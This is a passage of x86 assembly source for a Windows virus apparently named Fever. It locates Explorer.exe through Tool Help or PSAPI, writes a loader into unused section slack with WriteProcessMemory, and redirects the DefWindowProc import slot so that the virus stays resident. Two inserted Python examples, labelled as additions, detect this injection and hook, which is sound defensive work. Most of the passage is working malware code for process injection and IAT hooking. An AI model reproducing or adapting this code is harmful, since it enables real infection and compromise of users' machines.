                je      MemInfectWin9x

;===========================================================================
; Free USER32
;===========================================================================

FreeUser32:     push    dword ptr [ebp+hUser32]
                call    dword ptr [ebp+a_FreeLibrary]

;===========================================================================
; Back to host
;===========================================================================

TBLDOPOLYPOPS   equ     $

GoBack2Host:    pop     eax
                pop     eax
                pop     eax
                pop     eax
                ret

;===========================================================================
; Residency routines for Windows 9x
;===========================================================================

;===========================================================================
; Get hands on USER32.DLL
;===========================================================================

MemInfectWin9x: mov     eax,dword ptr [ebp+crcszUser32]
                mov     ecx,NUMUSER32APIS
                lea     esi,dword ptr [ebp+crc32User32APIsW9x]
                lea     edi,dword ptr [ebp+epUser32APIs]
                call    VirLoadLib
                mov     dword ptr [ebp+hUser32],eax
                or      eax,eax
                jz      GoBack2Host

;===========================================================================
; The functions provided by the Tool Help library make it easier for you
; to obtain information about currently executing applications. These
; functions are designed to streamline the creation of Win32-hosted tools,
; specifically debuggers
;===========================================================================

                mov     ebx,dword ptr [ebp+hKernel32]
                mov     ecx,NUMTOOLHELPAPIS
                lea     esi,dword ptr [ebp+crc32ToolhelpAPIs]
                lea     edi,dword ptr [ebp+epToolhelpAPIs]
                call    get_apis
                jecxz   DoneToolhelp
ExitMemWin9x:   jmp     FreeUser32

;===========================================================================
; Take a snapshot of the processes currently loaded in the system
;
; The snapshot taken by the CreateToolhelp32Snapshot function is examined
; by the other Tool Help functions to provide their results
;
; Access to the snapshot is read only. The snapshot handle acts like an
; object handle and is subject to the same rules regarding which processes
; and threads it is valid in
;===========================================================================

TH32CS_SNAPHEAPLIST     equ     00000001h
TH32CS_SNAPPROCESS      equ     00000002h
TH32CS_SNAPTHREAD       equ     00000004h
TH32CS_SNAPMODULE       equ     00000008h
TH32CS_INHERIT          equ     80000000h
TH32CS_SNAPALL          equ     TH32CS_SNAPHEAPLIST or \
                                TH32CS_SNAPPROCESS or \
                                TH32CS_SNAPTHREAD or \
                                TH32CS_SNAPMODULE

DoneToolhelp:   push    ecx                     ; th32ProcessID
                push    TH32CS_SNAPPROCESS      ; dwFlags
                call    dword ptr [ebp+a_CreateToolhelp32Snapshot]
                cmp     eax,0FFFFFFFFh          ; INVALID_HANDLE_VALUE
                je      ExitMemWin9x
                mov     dword ptr [ebp+hSnapshot],eax

;===========================================================================
; Retrieve information about the first process encountered in the system
; snapshot
;===========================================================================

                lea     edi,dword ptr [ebp+ProcessEntry]
                push    edi                             ; lppe
                mov     dword ptr [edi],SIZEOFPROCESSENTRY      ; dwSize
                push    eax                             ; hSnapshot
                call    dword ptr [ebp+a_Process32First]
                or      eax,eax
                jz      CloseSnapshot

CheckProcEntry: lea     esi,dword ptr [ebp+ProcessEntry.szExeFile]
                lea     edi,dword ptr [ebp+bufStrFileName]
                call    parse_filename
                mov     esi,edx
                call    get_str_crc32
                cmp     edx,dword ptr [ebp+crcszExplor] ; is Explorer.exe?
                je      EFoundTryMod

;===========================================================================
; Go to next process
;===========================================================================

                lea     eax,dword ptr [ebp+ProcessEntry]
                push    eax                             ; lppe
                push    dword ptr [ebp+hSnapshot]       ; hSnapshot
                call    dword ptr [ebp+a_Process32Next]
                or      eax,eax
                jnz     CheckProcEntry

CloseSnapshot:  push    dword ptr [ebp+hSnapshot]
                call    dword ptr [ebp+a_CloseHandle]
                jmp     ExitMemWin9x

;===========================================================================
; Close snapshot and create a new one, but this time we are going to list
; modules loaded by Explorer.exe
;===========================================================================

EFoundTryMod:   push    dword ptr [ebp+hSnapshot]
                call    dword ptr [ebp+a_CloseHandle]
                push    dword ptr [ebp+ProcessEntry.th32ProcessID]      ; th32ProcessID
                push    TH32CS_SNAPMODULE                               ; dwFlags
                call    dword ptr [ebp+a_CreateToolhelp32Snapshot]
                cmp     eax,0FFFFFFFFh                                  ; INVALID_HANDLE_VALUE
                je      ExitMemWin9x
                mov     dword ptr [ebp+hSnapshot],eax

;===========================================================================
; Perfect !!!! Lets retrieve 1st module using Module32First
;===========================================================================

                lea     edi,dword ptr [ebp+ModuleEntry]
                push    edi                             ; lpme
                mov     dword ptr [edi],SIZEOFMODULEENTRY       ; dwSize
                push    eax                             ; hSnapshot
                call    dword ptr [ebp+a_Module32First]
                or      eax,eax
                jz      CloseSnapshot

;===========================================================================
; Check if this is the module we are interested in
;===========================================================================

CheckEMod:      mov     eax,dword ptr [ebp+ProcessEntry.th32ModuleID]
                cmp     eax,dword ptr [ebp+ModuleEntry.th32ModuleID]
                je      GetModDone

;===========================================================================
; Go to next module
;===========================================================================

                push    edi                             ; lpme
                push    dword ptr [ebp+hSnapshot]       ; hSnapshot
                call    dword ptr [ebp+a_Module32Next]
                or      eax,eax
                jnz     CheckEMod
                jmp     CloseSnapshot                   ; abort if module not found

;===========================================================================
; hj0j0... Fine! Here we are with Explorer.exe module handle
;===========================================================================

GetModDone:     mov     edx,dword ptr [ebp+ModuleEntry.hModule]
                mov     dword ptr [ebp+hModule],edx

;===========================================================================
; Open process
;===========================================================================

                mov     eax,dword ptr [ebp+ProcessEntry.th32ProcessID]
                call    OpenProcess
                or      eax,eax
                jz      CloseSnapshot

;===========================================================================
; duh! Explorer.exe process is now 0wn3d
;===========================================================================

                call    FuckExplorer

;===========================================================================
; Close process
;===========================================================================

                push    dword ptr [ebp+hProcess]
                call    dword ptr [ebp+a_CloseHandle]
                jmp     CloseSnapshot

;===========================================================================
; Residency routines for Windows NT & Windows 2000
;===========================================================================

;===========================================================================
; Hands on USER32 APIs for Windows NT (use wide versions)
;===========================================================================

MemInfectWinNT: mov     eax,dword ptr [ebp+crcszUser32]
                mov     ecx,NUMUSER32APIS
                lea     esi,dword ptr [ebp+crc32User32APIsWNT]
                lea     edi,dword ptr [ebp+epUser32APIs]
                call    VirLoadLib
                mov     dword ptr [ebp+hUser32],eax
                or      eax,eax
                jz      GoBack2Host

;===========================================================================
; We need PSAPI.DLL to do the trick
;===========================================================================

                mov     eax,dword ptr [ebp+crcszPsapi]
                mov     ecx,NUMPSAPIAPIS
                lea     esi,dword ptr [ebp+crc32PsapiAPIs]
                lea     edi,dword ptr [ebp+epPsapiAPIs]
                call    VirLoadLib
                mov     dword ptr [ebp+hPsapi],eax
                or      eax,eax
                jz      FreeUser32

;===========================================================================
; Get a list of loaded processes (max. 32 processes)
;===========================================================================

DonePsapi:      lea     edi,dword ptr [ebp+ep_bytes]
                push    edi                     ; cbNeeded
                push    00000080h               ; cb (32 DWORDs)
                lea     esi,dword ptr [ebp+ProcessIdList]
                push    esi                     ; lpidProcess
                call    dword ptr [ebp+a_EnumProcesses]
                or      eax,eax
                jz      ExitMemNT

;===========================================================================
; To determine how many processes were enumerated by the call to
; EnumProcesses, divide the resulting value in the cbNeeded parameter by
; sizeof(DWORD)
;===========================================================================

                mov     ecx,dword ptr [edi]
                shr     ecx,02h                 ; divide ecx by 4... nice, isnt it?
                jecxz   ExitMemNT

;===========================================================================
; Now we have a list of process identifiers... follow it
;===========================================================================

ProcessLookup:  push    ecx
                cld
                lodsd
                push    esi

;===========================================================================
; Open process
;===========================================================================

                call    OpenProcess
                or      eax,eax
                jz      TryNextProcess

;===========================================================================
; Enumerate process modules... the 1st obtained module is the executable
; itself
;===========================================================================

                lea     edx,dword ptr [ebp+ep_bytes]    ; lpcbNeeded
                push    edx
                push    00000080h                       ; cb
                lea     esi,dword ptr [ebp+ModuList]
                push    esi                             ; lphModule
                push    eax                             ; hProcess
                call    dword ptr [ebp+a_EnumProcessModules]
                or      eax,eax
                jz      NcProcess
                cld
                lodsd                                   ; the first module is the .exe itself
                mov     dword ptr [ebp+hModule],eax

;===========================================================================
; Get module name using GetModuleBaseNameA API
;===========================================================================

                push    MAX_PATH                        ; nSize
                lea     esi,dword ptr [ebp+bufStrFileName]
                push    esi                             ; lpBaseName
                push    eax                             ; hModule
                push    dword ptr [ebp+hProcess]        ; hProcess
                call    dword ptr [ebp+a_GetModuleBaseNameA]
                or      eax,eax
                jz      NcProcess

;===========================================================================
; Module name is Explorer.exe? (use crc32 comparison)
;===========================================================================

                mov     edi,esi
                call    parse_filename
                mov     esi,edx
                call    get_str_crc32
                cmp     edx,dword ptr [ebp+crcszExplor] ; is Explorer.exe?
                jne     NcProcess

;===========================================================================
; If Explorer.exe found cleanup and go to the memory infection procedure
;===========================================================================

                pop     eax                             ; discard saved esi
                pop     eax                             ; discard saved ecx
                call    FuckExplorer

;===========================================================================
; Close process
;===========================================================================

                push    dword ptr [ebp+hProcess]
                call    dword ptr [ebp+a_CloseHandle]
                jmp     ExitMemNT

;===========================================================================
; Next process
;===========================================================================

NcProcess:      push    dword ptr [ebp+hProcess]
                call    dword ptr [ebp+a_CloseHandle]
TryNextProcess: pop     esi
                pop     ecx
                loop    ProcessLookup

;===========================================================================
; Residency proc failed!
;===========================================================================

ExitMemNT:      push    dword ptr [ebp+hPsapi]
                call    dword ptr [ebp+a_FreeLibrary]
                jmp     FreeUser32

;===========================================================================
; Open process
;
; On entry:
;       eax -> process ID
; On exit:
;       eax -> handle to process or NULL if error
;===========================================================================

PROCESS_TERMINATE               equ     00000001h
PROCESS_CREATE_THREAD           equ     00000002h
PROCESS_SET_SESSIONID           equ     00000004h
PROCESS_VM_OPERATION            equ     00000008h
PROCESS_VM_READ                 equ     00000010h
PROCESS_VM_WRITE                equ     00000020h
PROCESS_DUP_HANDLE              equ     00000040h
PROCESS_CREATE_PROCESS          equ     00000080h
PROCESS_SET_QUOTA               equ     00000100h
PROCESS_SET_INFORMATION         equ     00000200h
PROCESS_QUERY_INFORMATION       equ     00000400h

OpenProcess:    push    eax                     ; dwProcessId
                push    00000000h               ; bInheritHandle
                push    PROCESS_QUERY_INFORMATION or \
                        PROCESS_VM_READ or \
                        PROCESS_VM_WRITE or \
                        PROCESS_VM_OPERATION    ; dwDesiredAccess
                call    dword ptr [ebp+a_OpenProcess]
                mov     dword ptr [ebp+hProcess],eax
                ret

;===========================================================================
; Infect Explorer.exe in memory
;===========================================================================

;===========================================================================
; Now search for the section header list
;===========================================================================

FuckExplorer:   mov     ebx,dword ptr [ebp+hModule]
                mov     ecx,00000004h
                lea     esi,dword ptr [ebp+Explorer_MZ_lfanew]
                mov     eax,ebx
                add     eax,MZ_lfanew
                call    ReadProcessMem
                or      eax,eax
                jz      fe_exit
                lodsd                   ; there is a cld at the end of ReadProcessMem
                or      eax,eax         ; esi -> Explorer_FH_SizeOfOptionalHeader
                jz      fe_exit
                                        ; eax -> MZ_lfanew
                add     eax,ebx
                mov     edi,eax         ; edi -> PE header in Explorer.exe
                add     eax,00000004h+FH_SizeOfOptionalHeader
                dec     ecx
                dec     ecx             ; read a word
                call    ReadProcessMem
                or      eax,eax
                jz      fe_exit
                lodsw                   ; just to do esi -> Explorer_FH_NumberOfSections
                mov     eax,edi
                add     eax,00000004h+FH_NumberOfSections
                call    ReadProcessMem
                or      eax,eax
                jz      fe_exit
                lodsw                   ; esi -> Explorer_SectionHeader
                movzx   ecx,ax          ; ecx -> number of sections
                movzx   eax,word ptr [ebp+Explorer_FH_SizeOfOptionalHeader]
                add     edi,eax
                add     edi,00000004h+IMAGE_SIZEOF_FILE_HEADER  ; edi -> first section header

;===========================================================================
; Search for a suitable section
;===========================================================================

ExplorerHole:   push    ecx
                mov     eax,edi
                mov     ecx,IMAGE_SIZEOF_SECTION_HEADER
                call    ReadProcessMem
                or      eax,eax
                jz      e_nextsection

;===========================================================================
; Is this a valid section?
;===========================================================================

                cmp     dword ptr [esi+SH_Characteristics],\
                        IMAGE_SCN_MEM_READ or \
                        IMAGE_SCN_MEM_WRITE or \
                        IMAGE_SCN_CNT_INITIALIZED_DATA
                jne     e_nextsection
                mov     eax,dword ptr [esi+SH_SizeOfRawData]
                sub     eax,dword ptr [esi+SH_VirtualSize]
                js      e_nextsection
                cmp     eax,SIZEOF_EVL
                jae     ok_e_section

;===========================================================================
; Next section
;===========================================================================

e_nextsection:  add     edi,ecx
                pop     ecx
                loop    ExplorerHole

;===========================================================================
; No suitable section found
;===========================================================================

                jmp     fe_exit
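The scanner-side version of the ExplorerHole test, as an added example that is not part of the Fever source: parse a section table, report the sections that pass the same three checks (characteristics exactly READ|WRITE|CNT_INITIALIZED_DATA, SizeOfRawData not below VirtualSize, slack of at least the loader size) and then verify that the slack past VirtualSize is still zero-filled in the mapped image, which is where Explorer_patch points. The three-section table, the image bytes and the value SIZEOF_EVL = 0x60 are constructed for the example; the page only defines SIZEOF_EVL as `$-EVL_code`.

```python
"""Added example (not Fever code): the scanner-side twin of the section test
at ExplorerHole / ok_e_section. Parses IMAGE_SECTION_HEADER entries, reports
sections whose slack past VirtualSize could hold a loader, and checks whether
that slack is still zero-filled in a mapped image."""
import struct

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_SIZEOF_SECTION_HEADER = 40
# The virus compares for exact equality with this combination (jne e_nextsection).
TARGET_CHARACTERISTICS = (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
                          | IMAGE_SCN_CNT_INITIALIZED_DATA)
SIZEOF_EVL = 0x60   # assumed loader size; the page defines it only as $-EVL_code

# Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"


def parse_section_headers(table, number_of_sections):
    """Decode number_of_sections consecutive IMAGE_SECTION_HEADERs."""
    sections = []
    for i in range(number_of_sections):
        f = struct.unpack_from(SECTION_FMT, table, i * IMAGE_SIZEOF_SECTION_HEADER)
        sections.append({
            "name": f[0].rstrip(b"\x00").decode("ascii", "replace"),
            "VirtualSize": f[1], "VirtualAddress": f[2],
            "SizeOfRawData": f[3], "Characteristics": f[9],
        })
    return sections


def injectable_sections(sections, payload_size=SIZEOF_EVL):
    """(name, RVA where a loader would be placed, slack) for every section
    that passes the same three checks the virus makes."""
    hits = []
    for s in sections:
        if s["Characteristics"] != TARGET_CHARACTERISTICS:
            continue                                    # jne e_nextsection
        slack = s["SizeOfRawData"] - s["VirtualSize"]
        if slack < 0:
            continue                                    # js e_nextsection
        if slack >= payload_size:                       # jae ok_e_section
            hits.append((s["name"], s["VirtualAddress"] + s["VirtualSize"], slack))
    return hits


def dirty_slack(image, section):
    """RVA of the first non-zero byte between VirtualSize and SizeOfRawData,
    or None. In a clean mapping that range is padding and should be zero."""
    start = section["VirtualAddress"] + section["VirtualSize"]
    end = section["VirtualAddress"] + section["SizeOfRawData"]
    for rva in range(start, end):
        if image[rva] != 0:
            return rva
    return None


def build_section(name, vsize, va, rawsize, characteristics):
    """Pack one header; used only to construct the sample table below."""
    return struct.pack(SECTION_FMT, name.ljust(8, b"\x00"), vsize, va, rawsize,
                       0, 0, 0, 0, 0, characteristics)


# Constructed three-section table, not taken from any real explorer.exe.
SAMPLE_TABLE = (
    build_section(b".text", 0x0F00, 0x1000, 0x1000, 0x60000020)            # code, exec, read
    + build_section(b".data", 0x0800, 0x2000, 0x1000, TARGET_CHARACTERISTICS)
    + build_section(b".rsrc", 0x0400, 0x3000, 0x0400, 0x40000040)          # read, init data
)

# Constructed image: all zero except two bytes written into the .data slack,
# the 'push eax / pushad' prologue that EVL_code starts with.
SAMPLE_IMAGE = bytearray(0x4000)
SAMPLE_IMAGE[0x2800:0x2802] = b"\x50\x60"


if __name__ == "__main__":
    secs = parse_section_headers(SAMPLE_TABLE, 3)
    for name, rva, slack in injectable_sections(secs):
        print(f"{name}: {slack:#x} bytes of slack, loader would sit at RVA {rva:#x}")
        hit = dirty_slack(SAMPLE_IMAGE, next(s for s in secs if s["name"] == name))
        print("  slack is", "clean" if hit is None else f"written at RVA {hit:#x}")
```

Run against a real process, the section table comes from the mapped PE header and `image` from a memory read of the module; a non-`None` result from `dirty_slack` on a section that `injectable_sections` reported is the condition worth alerting on.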

;===========================================================================
; Yes, this is a valid section... write virus loader
;===========================================================================

ok_e_section:   pop     ecx                     ; cleanup stack
                mov     eax,dword ptr [ebp+a_DefWindowProc]
                mov     dword ptr [ebp+EVL_a_OriginalAPIAddr],eax
                mov     eax,dword ptr [ebp+a_OpenFileMappingA]
                mov     dword ptr [ebp+EVL_a_OpenFileMapping],eax
                mov     eax,dword ptr [ebp+a_MapViewOfFile]
                mov     dword ptr [ebp+EVL_a_MapViewOfFile],eax
                mov     eax,ebx
                add     eax,dword ptr [esi+SH_VirtualAddress]
                add     eax,dword ptr [esi+SH_VirtualSize]
                mov     dword ptr [ebp+Explorer_patch],eax
                mov     ecx,SIZEOF_EVL
                lea     esi,dword ptr [ebp+EVL_code]
                call    WriteProcessMem
                or      eax,eax
                jz      fe_exit

;===========================================================================
; Go to Explorer.exe data directory
;===========================================================================

                mov     eax,ebx
                add     eax,dword ptr [ebp+Explorer_MZ_lfanew]
                add     eax,00000004h+\
                        IMAGE_SIZEOF_FILE_HEADER+\
                        OH_DataDirectory.DE_Import.DD_VirtualAddress
                mov     ecx,00000004h
                lea     esi,dword ptr [ebp+Explorer_DE_Import]
                call    ReadProcessMem
                or      eax,eax
                jz      fe_exit

;===========================================================================
; Search for USER32 import module descriptor
;===========================================================================

                lodsd
                add     eax,ebx
                mov     edi,eax
e_search_k32:   mov     eax,edi
                mov     ecx,IMAGE_SIZEOF_IMPORT_DESCRIPTOR
                lea     esi,dword ptr [ebp+Explorer_ImportDescriptor]
                call    ReadProcessMem
                or      eax,eax
                jz      fe_exit

;===========================================================================
; Last import module descriptor!?
;===========================================================================

                cmp     dword ptr [esi],00000000h
                je      fe_exit

;===========================================================================
; Check import module descriptor ID_Name
;===========================================================================

                mov     eax,ebx
                add     eax,dword ptr [esi+ID_Name]
                mov     ecx,00000010h
                lea     esi,dword ptr [ebp+Explorer_ID_Name]
                call    ReadProcessMem
                or      eax,eax
                jz      fe_exit
                push    edi
                lea     edi,dword ptr [ebp+bufStrFileName]
                call    parse_filename
                mov     esi,edx
                call    get_str_crc32
                pop     edi
                cmp     edx,dword ptr [ebp+crcszUser32]  ; is USER32.DLL?
                je      e_found_k32

;===========================================================================
; Next import module descriptor
;===========================================================================

                add     edi,IMAGE_SIZEOF_IMPORT_DESCRIPTOR
                jmp     e_search_k32

;===========================================================================
; USER32.DLL import module descriptor found
;===========================================================================

e_found_k32:    mov     edi,dword ptr [ebp+Explorer_ImportDescriptor.ID_FirstThunk]
                add     edi,ebx
                mov     ecx,00000004h
                lea     esi,dword ptr [ebp+Explorer_hook]
e_nextthunk:    mov     eax,edi
                call    ReadProcessMem
                or      eax,eax
                jz      fe_exit
                mov     eax,dword ptr [esi]
                or      eax,eax
                jz      fe_exit
                cmp     eax,dword ptr [ebp+a_DefWindowProc]
                je      e_poison
                add     edi,ecx
                jmp     e_nextthunk

;===========================================================================
; Gotcha!
;===========================================================================

e_poison:       mov     eax,edi
                mov     dword ptr [ebp+Explorer_init_hook],eax
                lea     esi,dword ptr [ebp+Explorer_patch]
                call    WriteProcessMem         ; ecx already loaded
                or      eax,eax
                jz      fe_exit
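The defender's counterpart of the e_search_k32 / e_nextthunk walk, as an added example that is not part of the Fever source: walk the import descriptors of a mapped image, find the USER32.DLL descriptor, and flag every resolved FirstThunk slot whose target lies outside USER32's own address range, which is exactly what the 4-byte write at e_poison leaves behind. The 4 KiB image, the two descriptors, the IAT contents and the module base addresses in MODULE_RANGES are all constructed for the example.

```python
"""Added example (not Fever code): IAT integrity check for one imported
module, the inverse of the e_search_k32 / e_nextthunk / e_poison walk."""
import struct

IMAGE_SIZEOF_IMPORT_DESCRIPTOR = 20
# OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
IMPORT_DESCRIPTOR_FMT = "<IIIII"


def read_cstring(image, rva):
    end = image.index(b"\x00", rva)
    return image[rva:end].decode("ascii", "replace")


def walk_import_descriptors(image, import_dir_rva):
    """Yield (module name, FirstThunk RVA). The virus stops on a zero first
    dword; Name and FirstThunk are tested here instead, since
    OriginalFirstThunk may legitimately be zero in old-style imports."""
    rva = import_dir_rva
    while True:
        d = struct.unpack_from(IMPORT_DESCRIPTOR_FMT, image, rva)
        if d[3] == 0 and d[4] == 0:
            return
        yield read_cstring(image, d[3]), d[4]
        rva += IMAGE_SIZEOF_IMPORT_DESCRIPTOR


def iat_entries(image, first_thunk_rva):
    """(slot RVA, resolved address) pairs up to the zero terminator, read
    4 bytes at a time as e_nextthunk does."""
    entries = []
    rva = first_thunk_rva
    while True:
        (value,) = struct.unpack_from("<I", image, rva)
        if value == 0:
            return entries
        entries.append((rva, value))
        rva += 4


def find_hooked_thunks(image, import_dir_rva, module_ranges, module="user32.dll"):
    """module_ranges: {lower-case name: (base, size)} from the module list.
    Returns the IAT slots of `module` whose target lies outside it."""
    base, size = module_ranges[module]
    hits = []
    for name, first_thunk in walk_import_descriptors(image, import_dir_rva):
        if name.lower() != module:
            continue
        for slot_rva, target in iat_entries(image, first_thunk):
            if not base <= target < base + size:
                hits.append((slot_rva, target))
    return hits


# Constructed sample: module bases and sizes are made up for the example.
MODULE_RANGES = {
    "kernel32.dll": (0x77E60000, 0x000F6000),
    "user32.dll": (0x77D40000, 0x00090000),
}


def build_sample_image(hooked=False):
    """A 4 KiB RVA-indexed image holding two import descriptors, their
    name strings and a small resolved IAT."""
    image = bytearray(0x1000)
    image[0x200:0x20D] = b"KERNEL32.dll\x00"
    image[0x210:0x21B] = b"USER32.dll\x00"
    struct.pack_into(IMPORT_DESCRIPTOR_FMT, image, 0x100, 0x400, 0, 0, 0x200, 0x300)
    struct.pack_into(IMPORT_DESCRIPTOR_FMT, image, 0x114, 0x420, 0, 0, 0x210, 0x320)
    # descriptor at 0x128 stays all zero: end of the list
    struct.pack_into("<II", image, 0x300, 0x77E61234, 0x77E65678)   # kernel32 slots
    struct.pack_into("<II", image, 0x320, 0x77D41234, 0x77D45678)   # user32 slots, 2nd = DefWindowProcA
    if hooked:
        # The slot now points into the host's own .data slack, where a loader was written.
        struct.pack_into("<I", image, 0x324, 0x00402800)
    return image


if __name__ == "__main__":
    for label, img in (("clean", build_sample_image()), ("hooked", build_sample_image(True))):
        print(label, find_hooked_thunks(img, 0x100, MODULE_RANGES))
```

On a live system the module ranges come from the same Tool Help or PSAPI module list the virus itself uses, and the image from reading the PE header and IAT pages of the process; a slot whose target falls inside the executable's own image rather than the exporting DLL is the signature of this hook.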

;===========================================================================
; Done !!!! ieieie !!!!
;===========================================================================

fe_exit:        ret

;===========================================================================
; Code injected into Explorer.exe
;
; The purpose of this code is to get access to virus memory from
; Explorer.exe
;===========================================================================

EVL_code        equ     $

;===========================================================================
; Let some space for the return address... then save all regs
;===========================================================================

                push    eax
                pushad

;===========================================================================
; This is the original address of the API... lets make the return address
; point to it
;===========================================================================

                db      0B8h                    ; mov eax,imm32 -> original API address
EVL_a_OriginalAPIAddr   dd      00000000h
                mov     dword ptr [esp+cPushad],eax

;===========================================================================
; Attempt to avoid reentrance problems
;===========================================================================

                call    MultiThreadSafe
                db      00h                     ; only changed over hook code, not over main virus body
MultiThreadSafe: pop    esi
                mov     edi,esi
                cld
                lodsb
                or      al,al
                jnz     MaybeOnNextCall
                dec     al
                stosb

;===========================================================================
; Try to open the virus file-mapping
;
; There is some kinda race condition here... if the infected program
; terminates before this point we wont be able to find the rest of the
; virus in memory...
;
; In that case the hook will stay present, and this code may be called
; again on next attempts
;===========================================================================

                call    get_szObjName           ; lpName
szObjectName    db      10h dup (00h)
get_szObjName:  push    00000000h               ; bInheritHandle
                mov     edi,FILE_MAP_WRITE
                push    edi                     ; dwDesiredAccess
                db      0B8h                    ; mov eax,imm32 -> OpenFileMappingA
EVL_a_OpenFileMapping   dd      00000000h
                call    eax
                or      eax,eax
                jz      MaybeOnNextCall

;===========================================================================
; The file-mapping is here... get an image of it
;===========================================================================

                xor     edx,edx
                push    edx                     ; dwNumberOfBytesToMap
                push    edx                     ; dwFileOffsetLow
                push    edx                     ; dwFileOffsetHigh
                push    edi                     ; dwDesiredAccess
                push    eax                     ; hFileMappingObject
                db      0B8h                    ; mov eax,imm32 -> MapViewOfFile
EVL_a_MapViewOfFile     dd      00000000h
                call    eax
                or      eax,eax
                jz      MaybeOnNextCall

;===========================================================================
; Great! We have access to virus allocated memory, but remember we're
; inside Explorer.exe !!!!
;
; Jump to virus complete image in order to complete initialization inside
; Explorer.exe
;===========================================================================

                add     eax,offset ExplorerInit-offset viro_sys
                call    eax

;===========================================================================
; Restore regs and jump to original API code
;===========================================================================

MaybeOnNextCall: popad
                ret

SIZEOF_EVL      equ     $-EVL_code

;===========================================================================
; Read process memory routine
;
; On entry:
;       eax -> pointer to the base address from which to read
;       ecx -> specifies the requested number of bytes to read
;       esi -> pointer to a buffer that receives the contents from the
;              address space
;
;       [ebp+hProcess] contains the target process handle
;
; On exit:
;       eax -> NULL if error
;
;       ebx, ecx, esi, edi, ebp preserved
;===========================================================================

ReadProcessMem: push    edi
                push    ecx
                lea     edi,dword ptr [ebp+ep_bytes]    ; lpNumberOfBytesRead
                push    edi
                push    ecx                             ; nSize
                push    esi                             ; lpBuffer
                push    eax                             ; lpBaseAddress
                push    dword ptr [ebp+hProcess]        ; hProcess
                call    dword ptr [ebp+a_ReadProcessMemory]
                pop     ecx
                or      eax,eax
                jz      ExitREM
                cmp     dword ptr [edi],ecx             ; all requested bytes read?
                je      ExitREM
                xor     eax,eax                         ; short read -> error
ExitREM:        pop     edi
                cld
                ret

;===========================================================================
; Write process memory routine
;
; On entry:
;       eax -> pointer to the base address in the specified process to
;              which data will be written
;       ecx -> specifies the number of bytes to write
;       esi -> pointer to the buffer that contains data to be written
;
;       [ebp+hProcess] contains the target process handle
;
; On exit:
;       eax -> NULL if error
;
;       ebx, ecx, esi, edi, ebp preserved
;===========================================================================

WriteProcessMem: push   edi
                push    ecx
                lea     edi,dword ptr [ebp+ep_bytes]    ; lpNumberOfBytesWritten
                push    edi
                push    ecx                             ; nSize
                push    esi                             ; lpBuffer
                push    eax                             ; lpBaseAddress
                push    dword ptr [ebp+hProcess]        ; hProcess
                call    dword ptr [ebp+a_WriteProcessMemory]
                pop     ecx
                or      eax,eax
                jz      ExitWEM
                cmp     dword ptr [edi],ecx             ; all requested bytes written?
                je      ExitWEM
                xor     eax,eax                         ; short write -> error
ExitWEM:        pop     edi
                cld
                ret

;===========================================================================
; Make CRC lookup table
;
; Generate a table for a byte-wise 32-bit CRC calculation on the polynomial:
; x^32+x^26+x^23+x^22+x^16+x^12+x^11+x^10+x^8+x^7+x^5+x^4+x^2+x+1.
;
; Polynomials over GF(2) are represented in binary, one bit per coefficient,
; with the lowest powers in the most significant bit. Then adding polynomials
; is just exclusive-or, and multiplying a polynomial by x is a right shift by
; one. If we call the above polynomial p, and represent a byte as the
; polynomial q, also with the lowest power in the most significant bit (so the
; byte 0xb1 is the polynomial x^7+x^3+x+1), then the CRC is (q*x^32) mod p,
; where a mod b means the remainder after dividing a by b.
;
; This calculation is done using the shift-register method of multiplying and
; taking the remainder. The register is initialized to zero, and for each
; incoming bit, x^32 is added mod p to the register if the bit is a one (where
; x^32 mod p is p+x^32 = x^26+...+1), and the register is multiplied mod p by
; x (which is shifting right by one and adding x^32 mod p if the bit shifted
; out is a one). We start with the highest power (least significant bit) of
; q and repeat for all eight bits of q.
;
; The table is simply the CRC of all possible eight bit values. This is all
; the information needed to generate CRCs on data a byte at a time for all
; combinations of CRC register values and incoming bytes.
;
; Original C code by Mark Adler
; Translated to asm for Win32 by GriYo
;===========================================================================

make_crc_tbl:

;===========================================================================
; Make exclusive-or pattern from polynomial (0EDB88320h)
;
; The following commented code is an example of how to make the
; exclusive-or pattern from the polynomial at runtime
;
;               xor     edx,edx
;               mov     ecx,0000000Eh           ; 14 terms in tbl_terms
;               lea     ebx,dword ptr [ebp+tbl_terms]
; calc_poly:    mov     eax,ecx
;               dec     eax                     ; index 13..0 (ecx runs 14..1)
;               xlatb                           ; al -> power of this term
;               sub     eax,0000001Fh
;               neg     eax                     ; 31-power = bit position
;               bts     edx,eax
;               loop    calc_poly
;
; edx contains now the exclusive-or pattern
;
; The polynomial is:
;
; x^32+x^26+x^23+x^22+x^16+x^12+x^11+x^10+x^8+x^7+x^5+x^4+x^2+x^1+x^0
;
; tbl_terms     db      0,1,2,4,5,7,8,10,11,12,16,22,23,26
;
;===========================================================================

                cld
                mov     ecx,00000100h
                lea     edi,dword ptr [ebp+tbl_CRC32]
crc_tbl_do:     mov     eax,00000100h
                sub     eax,ecx                 ; eax = 0..255 as ecx counts down
                push    ecx
                mov     ecx,00000008h
make_crc_value: shr     eax,01h
                jnc     next_value
                xor     eax,0EDB88320h
next_value:     loop    make_crc_value
                pop     ecx
                stosd
                loop    crc_tbl_do
                ret

;===========================================================================
; Return a 32-bit CRC of the contents of the buffer
;
; On entry:
;       esi -> ptr to buffer
;       ecx -> buffer size
; On exit:
;       edx -> 32-bit CRC
;===========================================================================

get_crc32:      cld
                push    edi
                xor     edx,edx                 ; register starts at zero, no final xor
                lea     edi,dword ptr [ebp+tbl_CRC32]
crc_calc:       push    ecx
                lodsb
                xor     eax,edx
                and     eax,000000FFh
                shr     edx,08h
                xor     edx,dword ptr [edi+eax*4]       ; dword table -> index scaled by 4
                pop     ecx
                loop    crc_calc
                pop     edi
                ret

;===========================================================================
; Get a 32-bit CRC of a null terminated string
;
; On entry:
;       esi -> ptr to string
; On exit:
;       edx -> 32-bit CRC
;===========================================================================

get_str_crc32:  cld
                push    ecx
                push    edi
                mov     edi,esi
                xor     eax,eax
                mov     ecx,eax
crc_sz:         inc     ecx
                scasb
                jnz     crc_sz                  ; ecx counts the null terminator too
                call    get_crc32
                pop     edi
                pop     ecx
                ret

;===========================================================================
; Get the entry-point of GetProcAddress
;
; On entry:
